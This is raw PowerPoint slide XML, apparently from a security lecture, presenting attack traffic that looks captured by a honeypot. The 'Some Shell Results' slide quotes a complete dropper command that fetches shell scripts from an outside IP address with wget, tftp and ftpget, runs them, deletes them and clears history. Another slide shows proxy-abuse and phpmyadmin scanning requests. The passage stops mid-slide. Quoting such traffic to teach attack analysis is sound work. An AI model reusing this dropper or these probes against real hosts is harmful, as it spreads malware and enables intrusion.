                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/attachments/533491609602359336/538712116970913822/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cons.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> python3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cons.py</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FE3EB62-5899-DD4D-8B54-925EE0B1C4EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>7/21/19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D446E4E8-327D-A842-B91A-5923ED66B4EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© Steve Beaty and others</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9A21E5B-20B7-584C-8BF4-0E64D0DED10D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FCF0B8E-C764-B441-826F-3009896208B1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18040476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3D52E-7B49-2B4F-AD58-FB3CBB65A45C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some Shell Results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EBF0049-A21E-A84F-8CC6-F71B6B307856}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cd /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> || cd /var/run || cd /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mnt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> || cd /root || cd /; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> http://102.165.48.81/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>njs.sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> +x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>njs.sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>njs.sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tftp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 102.165.48.81 -c get tftp1.sh; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> +x tftp1.sh; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> tftp1.sh; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tftp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -r tftp2.sh -g 102.165.48.81; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> +x tftp2.sh; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> tftp2.sh; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ftpget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -v -u anonymous -p anonymous -P 21 102.165.48.81 ftp1.sh ftp1.sh; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ftp1.sh; rm -rf </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>njs.sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> tftp1.sh tftp2.sh ftp1.sh;history -c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59796CE3-C0FB-014C-BA92-9FDA01C841A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>7/21/19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEC00CC8-6ECD-D449-8515-629A5D60E2A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© Steve Beaty and others</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23FDB28E-3F7E-B84D-886C-3298102E13C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FCF0B8E-C764-B441-826F-3009896208B1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1603863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35949-1C4A-6A4A-8FBB-7E04BFABDE03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some HTTP Results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51A20786-3111-9C4A-BBC0-492BBA8FD734}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CONNECT xui.ptlogin2.qq.com:443 HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>phpmyadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/scripts/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>setup.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>User-Agent: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
